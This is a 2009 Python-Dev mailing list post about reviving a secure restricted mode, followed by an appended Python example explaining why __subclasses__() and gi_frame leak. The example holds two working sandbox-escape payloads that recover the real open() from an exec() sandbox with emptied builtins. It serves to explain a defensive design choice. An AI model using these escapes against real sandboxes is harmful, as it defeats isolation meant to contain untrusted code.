[Python-Dev] Reviving restricted mode?

tav tav at espians.com
Sun Feb 22 22:22:27 CET 2009


Hey guys,

  benjamin> Even if this patch manages to plug all the holes in the
  benjamin> current Python, do we really want to commit our
  benjamin> selves to maintaining it through language evolution
  benjamin> which will surely introduce new subtle ways to
  benjamin> circumvent the guard?

If it would be helpful, I am happy to maintain this as Python evolves.

I've already been maintaining the PJE-inspired ctypes-based approach
and monkeypatches for various Python versions for a while now. See
secure.py, secure25.py, secure26.py and secure30.py in:

  http://github.com/tav/plexnet/tree/9dabc570a2499689e773d1af3599a29102071f80/source/plexnet/util

Also, my plans for world domination depend on a secure Python, so I
have the necessary incentives ;p

  samuele> I don't have much time these days, for sure not
  samuele> until pycon us, to look at the proposed code.

Thanks in advance if/when you get the time for this, Samuele!

  samuele> E provides and incorporates a lot of thinking
  samuele> around [snip]

The function-based approach I am taking is very much taken from E and
inspired by an insight that Ka-Ping Yee had on Python-Dev years ago.

See http://www.erights.org/elib/capability/ode/index.html for a direct
parallel to the approach I've taken...

  guido> For Tav's benefit, I think it would be good to at
  guido> least add "IsRestricted" checks to
  guido> __subclasses__(), gi_code and gi_frame --
  guido> that's a trivial patch and if he believes it's
  guido> enough he can create a sandbox on app engine
  guido> and invite people to try to break out of it... If
  guido> someone succeeds....

If someone succeeds...

...My missus might end up leaving me on account of so much crying ;p

Seriously though, it's a relatively risk-free approach. The only
person who stands to lose out is me if I'm wrong =)

In the worst case scenario, this approach would help identify other
"leak" attributes/methods -- which I'm hoping won't be found.

And, in an ideal scenario, we'd have the basis for secure Python
interpreter/programming... which, together with PyPy's sandboxed
interpreter, would seriously rock!

-- 
enthusiastically, tav

plex:espians/tav | tav at espians.com | +44 (0) 7809 569 369
http://tav.espians.com | http://twitter.com/tav | skype:tavespian
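The attributes Guido lists above (__subclasses__(), gi_code, gi_frame) are the classic "leak" attributes of a naive restricted mode. The following is an added example, not code from this thread or from tav's secure.py: it builds the simplest possible sandbox (exec() with an emptied __builtins__) and shows that both object.__subclasses__() and a generator's gi_frame hand the real builtins straight back to the untrusted code. The names run_restricted, host_rows and the payload strings are hypothetical, constructed for this illustration.

```python
"""Why __subclasses__() and gi_frame are sandbox leaks (added example).

The "sandbox" here is exec() with an empty __builtins__ dict, which is
what many ad-hoc restricted-mode attempts amount to. The untrusted
payloads below use only attribute access, for/try and the literal ()
and {} so they need no builtin names at all.
"""


def run_restricted(src: str, **injected):
    """Run untrusted source with no builtins plus any objects the host
    chooses to hand in (hypothetical helper). Returns whatever the
    payload stored in the name `result`, or None."""
    ns = {"__builtins__": {}}  # no open(), no __import__, no getattr ...
    ns.update(injected)
    exec(src, ns)
    return ns.get("result")


def builtins_stripped() -> bool:
    """Sanity check: the naive sandbox really does hide open()."""
    try:
        run_restricted("result = open")
    except NameError:
        return True
    return False


# Leak 1: ().__class__.__base__ is `object`; object.__subclasses__() lists
# every class loaded in the interpreter. Any class with a Python-level
# __init__ carries __init__.__globals__, i.e. its defining module's
# globals, and those contain that module's real __builtins__ (a dict for
# imported modules, the builtins module itself for __main__).
SUBCLASSES_LEAK = """
for cls in ().__class__.__base__.__subclasses__():
    try:
        b = cls.__init__.__globals__['__builtins__']
        # dict check without isinstance(): compare __class__ to {}'s class
        result = b['open'] if b.__class__ is {}.__class__ else b.open
    except:
        continue  # slot wrappers have no __globals__; keep scanning
    break
"""

# Leak 2: a generator object the host hands in "for iteration only" still
# exposes gi_frame, and a frame exposes f_builtins (and f_globals, and
# gi_code the code object). One attribute chain recovers the builtins.
GI_FRAME_LEAK = "result = rows.gi_frame.f_builtins['open']"


def host_rows():
    """A trusted-side generator the host passes into the sandbox as a
    harmless-looking iterator (hypothetical)."""
    yield 1
    yield 2


def subclasses_escape():
    """Return what the __subclasses__ payload recovers (the real open)."""
    return run_restricted(SUBCLASSES_LEAK)


def gi_frame_escape():
    """Return what the gi_frame payload recovers from a host generator."""
    return run_restricted(GI_FRAME_LEAK, rows=host_rows())


if __name__ == "__main__":
    print("naive sandbox hides open():", builtins_stripped())
    print("__subclasses__ leak gives:", subclasses_escape())
    print("gi_frame leak gives:", gi_frame_escape())
```

Both payloads return the genuine builtins.open, which is exactly the capability the sandbox was meant to withhold; this is why an "IsRestricted" check has to live inside the interpreter on the attribute itself rather than in whatever namespace the untrusted code starts with.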